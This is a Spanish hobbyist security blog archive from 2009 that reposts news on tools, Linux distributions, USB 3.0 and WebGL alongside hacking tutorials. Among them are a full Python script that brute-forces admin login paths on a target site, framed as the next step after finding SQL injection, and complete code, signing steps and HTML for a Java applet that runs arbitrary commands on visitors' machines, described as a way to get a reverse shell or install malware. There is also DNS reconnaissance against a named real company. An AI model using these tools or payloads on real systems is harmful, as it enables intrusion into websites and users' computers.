30 sept 2009

Nueva versión de Cain & Abel

Caín y Abel es una herramienta de recuperación de contraseñas para los sistemas operativos de Microsoft, se característica por permitir de una forma fácil la recuperación de diversos tipos de contraseñas por diccionario,  fuerza bruta, ademas de permitir sniffiar la red en busca de estas contraseñas.

También permite decodificación de contraseñas, revelando de los cuadros de contraseña, descubrir las contraseñas almacenadas en caché y el análisis de protocolos de enrutamiento.
Los cambios en esta versión:

  • Añadido Abel64.exe y Abel64.dll para apoyar los hashes de la extracción en los sistemas operativos de  64bits.
  • Añadido soporte de NTLM hashes Dumper, MS-CACHE hashes Dumper, LSA Secrets Dumper, Wireless Password Decoder, credenciales para los sistemas operativos de  64bits.
  • Password Manager Decoder, Dialup Password Decoder.
  • Añadido Windows Live Mail (Windows 7) Password Decoder para POP3, IMAP, NNTP, SMTP y las cuentas LDAP.
  • Corregido un error de la Calculadora RSA SecurID dentro de la función de importación XML.
  • Totalmente reconstruido con Visual Studio 2008.
 Descargar Cain & Abel


Fuente: http://www.dragonjar.org

moonOS 3.0



MoonOS es una nueva distribución basada en Ubuntu y un exquisito escritorio Enlightenment diseñado por el artista camboyano Chanrithy Thim. Su última versión 3 "Makara" está construída sobre las fundaciones de Ubuntu 9.04 "Jaunty Jackalope" con su última actualización de seguridad 9.09 y Enlightenment DR17, además de paquetes como el Kernel 2.6.28, Firefox 3.5, Pidgin 2.6 con soporte de video XMPP y mucho más.

moonOS también tiene una edición especial con el ascendente LXDE como su escritorio principal, pero la misma todavía no se encuentra actualizada a esta más reciente versión 3. Sí está disponible, sin embargo, en su anterior versión 2 "Kachana".



Fuente: http://www.vivalinux.com.ar/

29 sept 2009

Todo sobre USB 3.0

Ya han comenzado a salir al mercado dispositivos que se conectan con el nuevo estándar USB 3.0, por ejemplo el disco duro de Freecom, sin embargo pocas personas tienen una idea de los cambios que trae este nuevo formato USB con respecto al largamente conocido y usado USB 2.0, vamos a reseñar algunos puntos importantes.

El USB 3.0 esta siendo llamado ya, y con justa razón, el USB superveloz y es que representa la próxima generación en conectividad entre las computadoras y los periféricos, por poner unos cuantos ejemplos: el mouse, las impresoras, las cámaras y filmadoras digitales, los dispositivos mp3 y mp4 y un largo etc. los cuales actualmente vienen usando el estándar USB 2.0, rápido pero cada vez más insuficiente.

Lo mejor del USB 3.0 es que será retrocompatible eso significa que va a seguir siendo factible conectar los millones de dispositivos que actualmente existen y usan USB 2.0 , en cuanto a la mejora en velocidad de transferencia, USB 3.0 permite una transmisión de datos 10 veces más rápida que USB 2.0, es decir, puede llegar a picos de transferencia de 5GB/s estamos hablando de transferir 25 GB en aproximadamente 70 segundos vs los 14 minutos que tomaría hacer la misma tarea con USB 2.0 y 9 horas con USB 1.1 y no solo eso, también ha demostrado una significativa mejora en cuanto eficiencia en consumo energético. Ahora la potencia del bus es de 900mA, antes solo era de 500mA, esto traducido a la práctica significa que se van a poder cargar desde el USB dispósitivos con mayor consumo energético y las baterías que cargan desde el USB cargarán más rápido. El controlador de host de USB 3.0 ya no accederá de forma continua a los dispositivos conectados y por lo tanto ya no consumirá y desperdiciará tanta energía, en lugar de esto los dispositivos USB 3.0 enviaran una señal al controlador de host cuando se inicia una transferencia de datos.

Otra diferencia sustancial con USB 2.0 es que el nuevo USB 3.0 puede leer y escribir datos simultáneamente, esto debido a que cuenta con 4 nuevas conexiones, dos para enviar datos y dos para recibirlos, en total el nuevo conector tendrá 8 conexiones (USB 2.0 solo trae cuatro).


Si bien es cierto USB 3.0 ya está en el mercado, pocos son aún los dispositivos que vienen equipados con  este nuevo estándar, sin embargo los investigadores esperan que para el 2012, USB 3.0 represente ya el 25% del mercado mundial.

28 sept 2009

Network Security Tools NST

Network Security Tools (NST) es una distribución de GNU/Linux con tecnología Live CD basado en Fedora, la idea (como bien lo dice su nombre) de la distribución es proveer el fácil acceso a las mejores herramientas de seguridad para redes de código libre (Open Source) que pueden ejecutarse en plataformas x86 (32 bits) y x64 (64 bits).

Me llama la atención que la gente de NST se basa en un artículo de INSECURE.ORG (los de Nmap) llamado “Top 100 Security Tools” y la mayoría de las herramientas allí descritas están incluidas en NST.

Cabe anotar que NST está completamente orientado a los SysAdmins, por lo que no hay que esperar a que tenga una apariencia elegante ni mucho menos bonita.

Otro punto a indicar, la imagen de la distribución pesa un poco mas de 1.2 GB.

Screenshots:



Página oficial.
Descarga.
Lista de Herramientas.

Fuente: http://www.rinconinformatico.net/

27 sept 2009

Cambios en el protocolo MSN permiten ver contactos en estado "No conectado" / "Invisible"

Según se puede leer en algunos foros y listas de correo en estas últimas semanas, parece ser que Microsoft está realizando cambios en su protocolo de mensajería instantánea "MSN", provocando algunos problemas y comportamientos anómalos en determinados clientes de messenger. Lo que nos llama la atención y suponemos es fruto de esos cambios realizados al protocolo MSN, es que con determinadas versiones de algunos clientes de mensajería, es posible averiguar que contactos se encuentran en estado "No conectado" o "Invisibles". En principio no se pueden enviar mensajes a los contactos invisibles, de todas formas esto posiblemente sea algo temporal, ya que como funcionalidad carece de toda lógica.

Cliente y Versión que actualmente identifican el estado "No conectado" / "Invisible":
  • Emessene 1.5 (GNU/Linux)
  • Amsn 0.97.2 (Windows / GNU/Linux)
  • Amsn 0.98b (Actual SVN para GNU/Linux)
  • Kopete 0.12.5 (GNU/Linux)
  • Pidgin 2.6.2 (GNU/Linux; Este cliente directamente los muestra como conectados)
Estos son los que hemos podido probar nosotros, no significa que no haya muchos más. Por ejemplo, la versión de Kopete 0.12.5, al conectar a la red MSN muestra una ventana por cada contacto en dicho estado con un mensaje similar a este:
The user XXXX is currently not signed in. Messages will not be delivered

Si buscamos esos contactos en la lista de kopete, podremos ver que salen en color gris pero con la mariposa de MSN a color, de poner el puntero del ratón sobre ella se verá un mensaje como ésta:



26 sept 2009

Mandriva Linux 2010 RC1



Se anunció así en su blog oficial el lanzamiento la primera versión Release Candidate (RC1) del próximo Mandriva Linux 2010, principalmente con correcciones de errores pero también con importantes novedades que incluyen el Kernel 2.6.31 y los escritorios GNOME 2.27.90, KDE 4.3 (con Amarok 2.2 Beta 2) y XFCE 4.6.1.

Es destacable que Mandriva Linux 2010 RC1 presenta varios nuevos servicios relacionados con el framework Nepomuk para crear un escritorio KDE4 "semántico". Nepomuk permite asociar metadatos a varios items del escritorio del usuario común como archivos, bookmarks, e-mails, eventos en su calendario, etc. Por ejemplo, en la imágen de arriba podemos ver al administrador de archivos Dolphin mostrando todos los recursos marcados con la etiqueta "semanticweb".

Mandriva Linux 2010 RC1 ya está disponible en todos sus Mirrors en su edición "Free", que incluye sólo software libre, en sendos DVDs para las plataformas i586 y x86-64, además de imágenes para VirtualBox con los escritorios GNOME y KDE.

Un segundo RC está programado para el próximo 8 de Octubre, con la versión definitiva de Mandriva Linux 2010 planeada para el 3 de Noviembre.
  • Descarga: Mandriva Linux 2010 RC1 ISO DVD (i586) (x86-64)
  • Descarga: Mandriva Linux 2010 RC1 VirtualBox (GNOME) (KDE)
Fuente: http://www.vivalinux.com.ar/

Encontrar Admin de una Web (2 métodos)

De la mano de hacking-avanzado.blogspot.com nos enseña como encontrar la página del administrador de una web usando el script admin-scan.py ya posteado anteriormente aquí, pero lo interesente no es ese método sino el segundo, el de encontrar el admin por medio de robots.txt que yo por lo menos no conocía.

PEN-TESTING: ENCONTRAR LA PAGINA DE ADMINISTRACIÓN DE UNA WEB

Algunas veces sucede que podemos encontrar una vulnerabilidad de sql-injection y, a simple vista, no hay quien vea dónde se encuentra la página de loggin del admin, por lo que no podemos terminar de reventar la página. Es aquí donde el siguiente script, bajado de darkc0de, resulta útil:


#/usr/bin/python
import sys, os, time, httplib

if sys.platform == 'linux' or sys.platform == 'linux2':
clearing = 'clear'
else:
clearing = 'cls'
os.system(clearing)


if len(sys.argv) != 2:
print "\n|---------------------------------------------------------------|"
print "| b4ltazar[@]gmail[dot]com                                      |"
print "|   03/2009     Admin login finder     v2.0                     |"
print "| Help: admin-find.py -h                                        |"
print "| Visit www.darkc0de.com and www.ljuska.org                     |"
print "|---------------------------------------------------------------|\n"
sys.exit(1)

for arg in sys.argv:
if arg == '-h':
print "\n|-------------------------------------------------------------------------------|"
print "| b4ltazar[@]gmail[dot]com                                                      |"
print "|   03/2009      Admin login finder     v2.0                                    |"
print "| Usage: admin-find.py www.site.com                                             |"
print "| Example: admin-find.py site.com                                               |"
print "| Visit www.darkc0de.com and www.ljuska.org                                     |"
print "|-------------------------------------------------------------------------------|\n"
sys.exit(1)



site = sys.argv[1].replace("http://","").rsplit("/",1)[0] 
site = site.lower()

admin_path = ['admin.php','admin/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/','memberadmin/','administratorlogin/','adm/','admin/account.php','admin/index.php','admin/login.php','admin/admin.php','admin/account.php','joomla/administrator','login.php',
'admin_area/admin.php','admin_area/login.php','siteadmin/login.php','siteadmin/index.php','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html','admin_area/index.php','bb-admin/index.php','bb-admin/login.php','bb-admin/admin.php','admin/home.php','admin_area/login.html','admin_area/index.html','admin/controlpanel.php','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html','webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html','admin/cp.php','cp.php','administrator/index.php','administrator/login.php','nsw/admin/login.php','webadmin/login.php','admin/admin_login.php','admin_login.php','administrator/account.php','administrator.php','admin_area/admin.html','pages/admin/admin-login.php','admin/admin-login.php','admin-login.php','bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','modelsearch/login.php','moderator.php','moderator/login.php','moderator/admin.php','account.php','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.php','admincontrol.php',
'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.php','adminarea/index.html','adminarea/admin.html','webadmin.php','webadmin/index.php','webadmin/admin.php','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.php','moderator.html','administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html','moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html','admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.php','account.html','controlpanel.html','admincontrol.html','panel-administracion/login.php','wp-login.php','adminLogin.php','admin/adminLogin.php','home.php','adminarea/index.php','adminarea/admin.php','adminarea/login.php','panel-administracion/index.php','panel-administracion/admin.php','modelsearch/index.php','modelsearch/admin.php','admincontrol/login.php','adm/admloginuser.php','admloginuser.php','admin2.php','admin2/login.php','admin2/index.php','adm/index.php','adm.php','affiliate.php','adm_auth.php','memberadmin.php','administratorlogin.php','administrador/']


print "\n|---------------------------------------------------------------|"
print "| b4ltazar[@]gmail[dot]com                                      |"
print "|   03/2009      Admin login finder     v2.0                    |"
print "| Visit www.darkc0de.com and www.ljuska.org                     |"
print "|---------------------------------------------------------------|\n"
print "\n[-] %s" % time.strftime("%X")

print "[+] Target:",site
print "[+] Checking paths..."
print


try:
for admin in admin_path:
admin = admin.replace("\n","")
admin = "/" + admin
connection = httplib.HTTPConnection(site)
connection.request("GET",admin)
response = connection.getresponse()
print "%s %s %s" % (admin, response.status, response.reason)
except(KeyboardInterrupt,SystemExit):
raise
except:
pass 


El script lo único que hace es pedir un montón de páginas que podrían ser la que buscamos, por ejemplo /admin/ y /administrador/ y sacar el return code. Si vemos un 200 es que hemos encontrado lo que buscamos. Un poco primitivo, pero eficiente. Al final de la lista de url's a intentar, he añadido "administrador", porque estos scripts suelen obviar el idioma español.

Lo ejecutamos así:
python adminfinder.py http://www.victima.es/ |grep -v 404

Y el resultado es éste:

Todos los NOT FOUND han sido redirigidos a la página de error, por eso da un 301. Pero, si os fijáis, ha encontrado /administrator/, que es la página de loggin del admin.

Además de este script, y como un recurso adicional, podemos echarle un ojo al archivo robots.txt, porque a veces los admins se olvidan de borrar los directorios que aparecen por defecto.En este caso, si vemos robots.txt nos encontramos esto:

User-agent: * Disallow: /administrator/ Disallow: /cache/ Disallow: /components/ [...]

Entre los directorios listados podemos encontrar de nuevo /administrator/

Script original aquí.

Fuente: http://hacking-avanzado.blogspot.com/

Gracias a todos !!!

Bueno... Me dirijo a UDs para darle las gracias por sus visitas, por sus comentarios, ya que me enorgullece tener casi 15 mil visitas en poco más de 2 meses...

Mayor fue mi sorpresa cuando veo mi nivel en el ranking tutop.com que ayer estaba solamente y ahora estoy con 1627 votos :O...

De verdad muchas gracias por el apoyo y por favor sigan votando que quiero salir 2° XD...

Ya pasé a las webs "AmateurReal", "VIDEOS PORNO GRATIS . XXX", "100 WEBCAMS XXX GRATIS" y "VideoDescargas XXX GRATIS" ajajajajajsdja... Sólo me gana -- TV PORNO GRATIS 24H -- que es casi utópico pasarlo, además usan scripts que molestan para obligarlos a votar, lo cual no quiero hacer... XD

Sigan leyendo el blog y voten por favor XD:


Gracias nuevamente, Salu2 y les cuento próximamente si me gano algo.

Salu2, ZioneR


25 sept 2009

WebGL ya está disponible en Firefox



La última versión de Firefox disponible como nightly build ahora incluye la implementación de WebGL del proyecto Mozilla.  En el video que acompaña este artículo se puede ver Firefox sobre Mac OSX mostrando un visor de modelos del juego Spore, implementado con WebGL.

Este nuevo estándar para manejar gráficos 3D en la web aun está en etapa de definición, pero algunos proyectos ya están creando las primeras implementaciones, tal como lo hizo WebKit hace unos días.

Aquellos que deseen probar la implementación de Mozilla, pueden descargar el último nightly build y activar la opción webgl.enabled_for_all_sites a través de la URL especial about:config. Esta nueva funcionalidad está disponible para los usuarios de Mac, Linux y Windows, pero estos últimos necesitan descargar un archivo DLL adicional y habilitar otras opciones.  Se pueden encontrar las instrucciones completas en el blog de Vladimir Vukićević.

La implementación de WebGL está basada en OpenGL, pero en el caso particular de Windows, esta API no siempre está disponible.  En forma temporal se está usando un port para Windows del proyecto de código abierto Mesa, pero hay planes de soportar Direct3D en el futuro, de tal forma que funcione en Windows nativamente.

Links:

Fuente: http://www.fayerwayer.com

El mejor tutorial de Metasploit Framework

Los creadores backtrack han liberado totalmente gratis el mejor manual y más completo que he visto del metasploit framework, este excelente framwork para desarrollar y ejecutar exploits.

La guía cubre desde los aspectos más básicos que debes tener en cuenta a la hora de ejecutar Metasploit, como los requerimientos de tu máquina, pasando por su instalación, hasta tocar temas como la interacción con la herramienta, como programar sobre ella y como ejecutar tu propio exploit programado con este framework.


Para acceder a este curso de Metasploit Framework, sólo es necesario contar con un navegador, internet y leer un poco de inglés técnico.


Fuente: http://www.dragonjar.org/

24 sept 2009

Belenix – Una distribucion de OpenSolaris

Para los que no conocen es:
Un sistema operativo libre publicado en 2005 a partir de la versión privativa de Solaris de Sun Microsystems. es también el nombre de un proyecto iniciado por Sun para construir y desarrollar una comunidad de usuarios alrededor de las tecnologías del sistema operativo del mismo nombre. Su licencia (CDDL), de tipo copyleft, no es compatible con la GPL, si bien es reconocida como una licencia libre tanto por la FSF como por la OSI.
Según los cánones, para aprender de algo debes sumergirte de lleno en ese algo, entrándonos, al contexto que mejor  aprendizaje que instalando en una maquina física, y no de forma virtualizado, digo esto por que gracias a la virtualización, nos ahorramos muchos problemas de compatibilidad de hardware, drivers, etc.

Buscando un poco en la red, me encuentro con , una basada en , instalable en el disco duro. Según la web oficial del proyecto:

, es una de con muy pocas modificaciones al sistema base, es estable y compatible con los demás paquetes de SUN. Igualmente es un completo entorno de desarrollo de completamente libre.
Esta nos permite probar en menos de 2 minutos, gracias al y si te gusta, puedes instalarla en tu disco duro para ir aprendiendo poco a poco la administracion de este sistema operativo.

Descarga del ISO
Web oficial

Fuente: http://www.rinconinformatico.net/

Identificar que servicios están corriendo en un determinado puerto con AMAP

Hoy vamos a echarle un breve vistazo a amap, una muy conocida herramienta que sirve para identificar qué servicio está corriendo en un determinado puerto. Tiene sus añitos, pero es obligatorio conocerla.

Para instalarla, simplemente hacemos lo siguiente:
wget http://freeworld.thc.org/releases/amap-5.2.tar.gz
tar xzfv amap-5.2.tar.gz
cd amap-5.2
./configure && make && make install

Y, salvo que nos falte alguna dependencia, ya la tenemos instalada. El siguiente paso sería actualizar las reglas, pero la actualización vía web no funciona demasiado bien. Así que lo que vamos a hacer es , primero, bajar los siguientes archivos al directorio amap-5.2:
wget http://freeworld.thc.org/thc-amap/appdefs.trig
wget http://freeworld.thc.org/thc-amap/appdefs.resp
wget http://freeworld.thc.org/thc-amap/appdefs.rpc

Y ahora repetimos la instalación, sin más ... Lo sé, no es la forma más bonita, pero es simple y funciona.

El uso es muy simple, dado nuestro servidor y el puerto que queremos examinar lo invocaremos así:
amap -Av servidor puerto

Y el resultado sería algo como esto:
root@hackme amap-5.2# amap -Av 192.168.1.100 25
Using trigger file ./appdefs.trig ... loaded 35 triggers
Using response file ./appdefs.resp ... loaded 390 responses
Using trigger file ./appdefs.rpc ... loaded 450 triggers

amap v5.2 (www.thc.org/thc-amap) started at 2009-09-24 17:13:13 - MAPPING mode

Total amount of tasks to perform in plain connect mode: 28
Waiting for timeout on 28 connections ...
Protocol on 10.3.3.100:25/tcp (by trigger http-get) matches smtp
Protocol on 10.3.3.100:25/tcp (by trigger http-head) matches nntp

Unidentified ports: none.

amap v5.2 finished at 2009-09-24 17:13:15

Que nos dice que en dicho puerto corre un servidor de correo electrónico. Normal, porque precisamente 25 es el puerto usado por SMTP.

¿Y dónde está la utilidad de esto? Desde luego, no en examinar configuraciones normales, como pueda ser un servidor web o uno de correo electrónico, como hemos hecho, sino en buscar servicios que hayan sido movidos por el administrador para protegerlos, entre ellos SSH y VPN. Es decir, servicios de administración remota. No es algo tan raro con los dos que he nombrado

Y, ¿dónde buscamos esos servicios raros? Pues, por ejemplo, ssh corre por defecto en el 22, por lo tanto es muy común encontrarlo en un puerto como el 1022, 122, 222, 2222, ... Es decir, un puerto fácil de recordar. Lo raro sería encontrarlo en el 2037, que no hay quien se acuerde.

Fuente: http://hacking-avanzado.blogspot.com/

23 sept 2009

Ejecución Applets de Java maliciosos

Un applet es un programa escrito en el lenguaje de programación Java que puede ser incluido en una página web HTML mediante la directiva "<em><applet></applet></em>". Cuando el navegador identifica un applet de java en el documento web a visualizar, el código java del applet se descarga al sistema operativo donde la maquina virtual de java (Java Virtual Machine o JVM) y se ejecuta, esto permite crear programas que cualquier usuario puede ejecutar con tan solo cargar una URL en su navegador si este tiene el plugin de java instalado.

La idea de los creadores de Java era crear un lenguaje que tuviera limitaciones intrínsecas o estructurales para acceder al sistema operativo por motivos de seguridad, el objetivo era evitar la creación de virus, gusanos o cualquier otro tipo de malware realizable con Java y que pudiera ser explotable desde el navegador. Este fue el motivo que provocó que en Java 1.0 no se permitiera acceso al sistema local del usuario, pero uso duró poco tiempo ya que dicha restricción limitaba mucho a los desarrolladores de applets de java y a los posibles usos de la tecnología Java vía web. A partir de la versión 1.1 se decidió permitir al código acceder a los recursos del sistema operativo local, siempre y cuando el applet estuviera firmado por una entidad de confianza o bien que el usuario de forma voluntaria aceptara la firma de certificado no confiable. Esto benefició y potencio mucho el uso de la tecnología Java para la creación de applets, ya que gracias a su condición multiplataforma y la posibilidad de acceso a los recursos del sistema operativo, se abrían infinitas posibilidades de desarrollo más interesantes, como la posibilidad de crear juegos en linea a través del navegador.

En lo que respecta a temas de seguridad, siempre se ha dicho que la relación existente entre la "facilidad de uso" y la "seguridad" es muy estrecha y como veremos, en el caso de los applets de java se sigue manteniendo esa premisa.

Anteriormente decíamos que un applet de java puede acceder a nuestro sistema si está firmado por una entidad de confianza, pero de no estarlo, siempre cabe la posibilidad de que el usuario acepte su certificado de forma manual por medio de una ventana parecida a esta.

Esta ventana es común encontrarla al utilizar servicios de chat en linea o mini juegos web que ofrece Internet, el problema recae en que la mayoría de usuarios están acostumbrados a pulsar sobre el botón de "Aceptar" sin ningún tipo de reparo con tal de jugar, la gran mayoría de ellos ni leen los mensajes de advertencia de dichas ventanas. La popularidad de estos applets en el ámbito recreativo junto a la sencilla forma que ofrece SUN de permitirles acceder al sistema operativo (Unix / Microsoft), deja por tanto una puerta abierta para realizar infecciones o ataques a usuarios de a pie de una forma muy simple.

Si se intenta ejecutar en el navegador un applet con instrucciones de acceso a recursos locales y no firmado por una entidad de confianza, no se podrá ejecutar, apareciendo en la consola de JVM un mensaje de error de este tipo:
java.security.AccessControlException: access denied

Lo que vamos a ver a continuación es como crear e integrar un sencillo Applet de java que ejecute un comando Unix (Xterm) en la maquina del usuario que acepte el certificado del applet.

Código del applet: skata.java
import java.applet.*;
import java.awt.*; 
import java.io.*;
public class skata extends Applet
{
     public void init()
     {
          Process f;
          String first = getParameter("first");
 
           try
           {
                f = Runtime.getRuntime().exec(first);
           }
 
           catch(IOException e)
           {
                e.printStackTrace();
           }
      }
}

Compilamos el fichero "skata.java" y generamos el fichero .jar
$ javac skata.java
$ jar -cf busi_applet.jar skata.class

Ahora debemos firmarlo, por lo que tenemos que crear un certificado (1 día de validez) y luego firmar el Applet:
$ keytool -genkey -alias pconcepto -validity 1 -v
$ jarsigner busi_applet.jar pconcepto -verbose

Una vez que tenemos el applet creado y firmado, generamos un documento html donde añadir el applet.
<html>
<body>
    <applet width="1" height="1" code="skata.class" archive="busi_applet.jar">
        <param name="first" value="xterm -e sleep 10">
        </applet>
</body>
</html>

Dado el anterior ejemplo, el fichero html y el applet (Fichero ".jar") deben estar en el mismo directorio, de no estar en la misma carpeta se debe indicar la ruta en la directiva "archive". Esta prueba de concepto ejecuta una terminal xterm en el sistema operativo (Unix) del usuario que acepte el certificado, los permisos con los que se ejecuta dicha terminal son los mismos que tiene el usuario que arranco el navegador. Para la prueba de concepto hemos seleccionado Xterm y un applet que lanza un solo comando, pero realmente se podría ejecutar cualquier comando o conjunto de comandos que atentase contra la seguridad del usuario, ya que con este método sería fácil obtener una shell inversa con privilegios de usuario, infectar con cualquier tipo de malware al sistema, intentar obtener la contraseña de root por medio de "alias" o cualquier otra cosa que se nos ocurra.

Prueba de concepto (Xterm): http://www.busindre.com/archivos/javapc/
NOTA: No todos los GNU/Linux vienen con Xterm instalada por defecto. Al usar este tipo de "ataques" bajo sistemas Windows es común que el antivirus lo detecte y avise al usuario.

Deshabilitar el uso de applets de java en Mozilla Firefox:
Editar > Preferencias > Contenido > Activar java

Enlaces de Interés:

Fuente: http://www.busindre.com/

Trisquel GNU/Linux 3.0


Se trata de una versión de Linux muy especial nacida en el 2005 en la universidad de Vigo. La característica que la hace especial es que todos y cada uno de sus paquetes deben comulgar con las cuatro libertades indicadas por la Free Software Foundation. Ésta es una de las pocas distros recomendadas por la fundación del proyecto GNU.

Para mantener ese compromiso con el software completamente libre, mantiene sus propios repositorios a los que aplica un filtrado muy alto con el fin de garantizar esta máxima, además de usar drivers 100% libres y Linux-libre como núcleo del sistema.

También incluye Trisquel Web Browser 3.0 (un navegador basado en Mozilla) además de GNOME 2.6, OpenOffice 3.0 y Gimp 2.6. Perdemos en novedad pero ganamos en estabilidad y robustez. Puedes bajarte la imagen de instalación pinchando en este enlace.




Web: Trisquel

Fuente: http://www.dosbit.com/

22 sept 2009

Consultas avanzadas a DNS

Para empezar, si no tenéis ni idea de lo que es un DNS --> WIKIPEDIA. Existen utilidades para realizar consultas a los servidores DNS. Vamos a ver dos de ellas: nslookup (disponible en sistemas Wiholndows y UNIX) y Dig (only UNIX =P). La información que vamos a obtener nos será de utilidad. Encontraremos información sobre los servidores DNS autorizados, destalles sobre un dominio y subdominios, nombres de equipos, obtenidos de registros A, PTR y CNAME, obtendremos también detalles de servidores de correo electrónico SMTP por medio de registos MX (Mail Exchanger).

En algunos casos, cuando el servidor DNS esté mal configurado, podremos enumerar información sobre sistemas operativos y plataformas utilizadas por los equipos, obtenidas por medio de HINFO y también cabe la posibilidad de obtener nombres y direcciones IP de equipos y redes internas privadas.

CONSULTAS DNS CON NSLOOKUP:

La herramienta nslookup está presente en sistemas Microsoft y UNIX. Es una herramienta interactiva que permite realizar consultas a servidores DNS. Si no tenéis ni idea del tipo de peticiones que existen, os recomiendo que miréis el artículo de la Wikipedia. No obstante os copio las opciones:

  • A = Address – (Dirección) Este registro se usa para traducir nombres de hosts a direcciones IP.
  • CNAME = Canonical Name – (Nombre Canónico) Se usa para crear nombres de hosts adicionales, o alias, para los hosts de un dominio. Es usado cuando se estan corriendo multiples servicios (como ftp y web server) en un servidor con una sola direccion ip. Cada servicio tiene su propia entrada de DNS (como ftp.ejemplo.com. y www.ejemplo.com.). esto también es usado cuando corres múltiples servidores http, con diferente nombres, sobre el mismo host.
  • NS = Name Server – (Servidor de Nombres) Define la asociación que existe entre un nombre de dominio y los servidores de nombres que almacenan la información de dicho dominio. Cada dominio se puede asociar a una cantidad cualquiera de servidores de nombres.
  • MX (registro) = Mail Exchange – (Registro de Intercambio de Correo) Asocia un nombre de dominio a una lista de servidores de intercambio de correo para ese dominio.
  • PTR = Pointer – (Indicador) También conocido como 'registro inverso', funciona a la inversa del registro A, traduciendo IPs en nombres de dominio.
  • SOA = Start of authority – (Autoridad de la zona) Proporciona información sobre la zona.
  • HINFO = Host INFOrmation – (Información del sistema informático) Descripción del host, permite que la gente conozca el tipo de máquina y sistema operativo al que corresponde un dominio.
  • TXT = TeXT - ( Información textual) Permite a los dominios identificarse de modos arbitrarios.
  • LOC = LOCalización - Permite indicar las coordenadas del dominio.
  • WKS = Generalización del registro MX para indicar los servicios que ofrece el dominio. Obsoleto en favor de SRV.
  • SRV = SeRVicios - Permite indicar los servicios que ofrece el dominio. RFC 2782
  • SPF = Sender Policy Framework - Ayuda a combatir el Spam. En este record se especifica cual o cuales hosts están autorizados a enviar correo desde el dominio dado. El servidor que recibe consulta el SPF para comparar la IP desde la cual le llega, con los datos de este registro.
Pues bien, para poder utilizar esta herramienta, primero la ejecutaremos y luego procederemos a realizar las consultas que veamos oportunas. Esto lo haremos de la siguiente manera:

$ nslookup #Ejecutamos nslookup
> set querytype = registro # El registro podrá ser uno de los expuestos arriba.
> dominio # Aquí pondremos el dominio que queremos consultar (ej. google.com)

Una mención importante merece "any", que nos pedirá al servidor dns que nos de toda la información que sepa sobre el dominio a consultar. Dicho esto, pongamonos manos a la obra y veamos que podemos hacer. Como ya se ha dicho anteriormente, las consultas "any" nos revelarán toda la información que contenta el DNS sobre el dominio. Veamos una consulta sobre nestle.es

$ nslookup
> set querytype=any
> nestle.es
Server: 88.88.88.88
Address: 88.88.88.88#88

Non-authoritative answer:
nestle.es
origin = eurdns1.nestle.com
mail addr = nestlednsadmin.nestle.com
serial = 2008041061
refresh = 43200
retry = 7200
expire = 1209600
minimum = 3600
nestle.es mail exchanger = 10 orhi.sarenet.es.
nestle.es mail exchanger = 5 mail.nestle.es.
Name: nestle.es
Address: 213.225.147.144
nestle.es nameserver = aoadns1.nestle.com.
nestle.es nameserver = ctrdns1.nestle.com.
nestle.es nameserver = amsdns1.nestle.com.
nestle.es nameserver = eurdns1.nestle.com.

Authoritative answers can be found from:
nestle.es nameserver = ctrdns1.nestle.com.
nestle.es nameserver = amsdns1.nestle.com.
nestle.es nameserver = aoadns1.nestle.com.
nestle.es nameserver = eurdns1.nestle.com.
mail.nestle.es internet address = 194.30.112.4
eurdns1.nestle.com internet address = 160.213.122.244
aoadns1.nestle.com internet address = 141.122.173.26
ctrdns1.nestle.com internet address = 141.122.124.100
amsdns1.nestle.com internet address = 165.131.174.49

Por lo visto Nestlé.es utiliza 4 servidores DNS (ctrdns1.nestle.com, amsdns1.nestle.com, aoadns1.nestle.com, eurdns1.nestle.com). También hemos obtenido información sobre sus servidores de correo (orhi.sarenet.es, mail.nestle.es).

Si quisiereamos obtener información específica sobre los servidores de correo bastaría con poner este comando:

$ nslookup
> set querytype=mx
> nestle.es

Podríamos intentar obtener información sobre el sistema informático mediante el registro "hinfo":

$ nslookup
> set querytipe=hinfo
> nestle.es

No os desaniméis si no os funciona este último comando. Es funcional cuando el servidor DNS está mal configurado y tiene permitido ese tipo de registros.
TRANSFERENCIA DE ZONA:

Muchas veces, un dominio no utiliza un solo DNS, sino que por cuestiones de estabilidad utilizan varios, estableciéndose uno de ellos como el primario y los otros como secundarios. Muchas veces un archivo de zona DNS incluye información sobre nombres que el servidor de nombres almacena sobre un dominio DNS específico, incluyendo información "confidencial" sobre redes privadas. Esto tene una explicación. Siempre que un servidor DNS secundario se inicia, solicita al servidor DNS primario una lista con los ordenadores de los que es responsable. Este proceso se llama Transferencia de Zona.

Para consultar qué servidores de dominio primarios y secundarios utiliza un servidor, haremos uso del siguiente comando:

$ nslookup
> set querytype=soa
> nestle.es

Non-authoritative answer:
nestle.es
origin = eurdns1.nestle.com
mail addr = nestlednsadmin.nestle.com
serial = 2008041061
refresh = 43200
retry = 7200
expire = 1209600
minimum = 3600

Authoritative answers can be found from:
nestle.es nameserver = ctrdns1.nestle.com.
nestle.es nameserver = amsdns1.nestle.com.
nestle.es nameserver = aoadns1.nestle.com.
nestle.es nameserver = eurdns1.nestle.com.
amsdns1.nestle.com internet address = 165.131.174.49
eurdns1.nestle.com internet address = 160.213.122.244
aoadns1.nestle.com internet address = 141.122.173.26
ctrdns1.nestle.com internet address = 141.122.124.100

